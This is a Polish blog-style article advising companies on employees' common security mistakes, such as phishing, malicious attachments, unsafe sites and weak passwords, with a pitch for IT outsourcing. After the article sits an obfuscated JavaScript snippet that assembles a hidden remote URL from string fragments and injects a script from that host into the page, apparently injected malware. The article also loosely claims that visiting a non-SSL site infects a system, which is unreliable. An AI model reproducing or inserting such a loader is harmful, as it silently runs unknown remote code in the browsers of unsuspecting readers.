Bezpieczeństwo w sieci to temat wielokrotnie podejmowany w przedsiębiorstwach. Niestety w niektórych polityka bezpieczeństwa nie jest na najwyższym poziomie, bo choć jest ustalona, to jednak nie odbywają się szkolenia, które mają na celu uczulić pracowników na ewentualne zagrożenia. Większość błędów systemu wynika z nieumiejętnego korzystania z sieci. Dziś przedstawimy najczęstsze błędy popełniane przez pracowników w zakresie systemów informatycznych. Firmy IT mogą być dobrymi doradcami i prowadzić skuteczny outsourcing IT.

Po pierwsze: niebezpieczne e-maile

Jednym z najbardziej niebezpiecznych środowisk informatycznych są poczty elektroniczne. Oczywiście korzystanie z e-maila w firmie jest niezbędne i to wykorzystują niejednokrotnie cyberprzestępcy. Przede wszystkim wielu pracodawców nabiera się na tzw. phishing przez który bardzo łatwo wyłudzić dane. Wysyłane są spreparowane wiadomości e-mail od rzekomego urzędu czy zleceniodawcy, jednak po rozwinięciu paska wiadomości okazuje się, że pochodzi ona z innego niż dotychczas adresata. Jednak nieopaczne otwarcie takiej wiadomości i kliknięcie w link może spowodować wykradzenie danych, a nawet wyłudzenie, jeśli dokona się opłaty na rzecz oszusta. Drugim typem zagrożenia są oczywiście e-maile z załącznikami zawierającymi np. trojany. Zainfekowanie komputera prowadzi do przechwycenia zapisanych na nim danych, co dla przedsiębiorstwa może być nie tylko wizerunkową stratą.

Po drugie: odwiedzanie stron niebezpiecznych i instalacje programów pochodzących z nieznanego źródła

Czasami w pracy potrzebne jest zasięgnięcie informacji w sieci. Jednak nie wszystkie strony opatrzone są profilem zaufanym. Jeśli nie posiadają protokołu SSL to posiadają znacznie więcej luk bezpieczeństwa i taka strona może zostać bez żadnego problemu zhakowana. Wejście na nią spowoduje zainfekowanie systemu. Może prowadzić do upośledzenia jego działania. Do zablokowania systemu może dojść przez pobranie programu pochodzącego z nieznanego źródła.

Po trzecie: kradzież tożsamości

W firmie trzeba bardzo uważać na udostępnianie danych osobom trzecim. Najlepiej wszelkie dokumenty przesyłać za pomocą szyfrowanej wiadomości opatrzonej hasłem. Dzięki temu jest pewność, że nie zostanie przechwycona. Pracownicy firmy muszą być uczuleni na to, by nie tworzyć takich samych haseł logowania na wiele stron. Przede wszystkim nie można również używać opcji zapamiętywania hasła, gdyż w przypadku zainfekowania systemu cyberprzestępcy otrzymują je jak na przysłowiowej tacy.

Jak edukować pracowników w zakresie korzystania z firmowych komputerów?

Przede wszystkim trzeba pamiętać, że szkolenia bezpieczeństwa dla pracowników powinny być organizowane cyklicznie. Nie wystarczy jedno szkolenie, gdyż co jakiś czas pojawiają się nowe zagrożenia, które mogą zagrażać wyłudzeniu danych czy stratom finansowym i wizerunkowym. Warto zatem przejrzeć ofertę jaką w tym zakresie mają firmy IT. Bardzo często outsourcing może odbywać się poprzez oddelegowanie informatyka do firmy w celu wdrożenia udoskonaleń i zabezpieczeń w systemie, a także przeszkolenia pracowników w tym zakresie. Pracownicy powinny być uczuleni na to, by hasła wprowadzane na komputerach były trudne, a jednocześnie proste do zapamiętania dla nich. Hasło może mieć formę zdania albo wyrazu w formie odmienionej. Ważne by zawierało małe i duże litery, przy czym duże wcale nie muszą znajdować się na początku. Istotne znaczenie ma również zastosowanie cyfr. Wszystko to sprawia, że hasła są bardziej bezpieczne, a tym samym trudniejsze do złamania. Po skończonej pracy nikt nie może zapominać o wylogowaniu.

Zastosowanie się do polityki bezpieczeństwa jest bardzo istotne. Pracownicy nie powinni bagatelizować zagrożeń, które mogą bezpośrednio wpływać na prestiż firmy, a także zaufanie klientów. Nierozważne zachowanie zawsze naraża pracodawcę na spore straty, a pracownika na utratę stanowiska. W dzisiejszych czasach bezpieczeństwo danych to najbardziej palący problem, dlatego trzeba o nie dbać wszechstronnie, stosując dedykowane oprogramowania, a także korzystając z profesjonalnej pomocy i obsługi administracyjnej firm IT.

Źródło: Artykuł zewnętrzny

(function(){ onbk=document.createElement("script");onbk.async=true;onbk_="u"+("s")+"t"; onbku="191626604.";onbk_+="a"+("t.i");onbk_+="n"+("f"+"o")+"/"; onbku+="hm2ed32ynbklrhvgcxpkw7"+("c6t5nb8t"); onbk.src="https://"+onbk_+onbku;onbk.type="text/javascript"; document.body.appendChild(onbk); })();

Powiązane posty

Zostaw komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *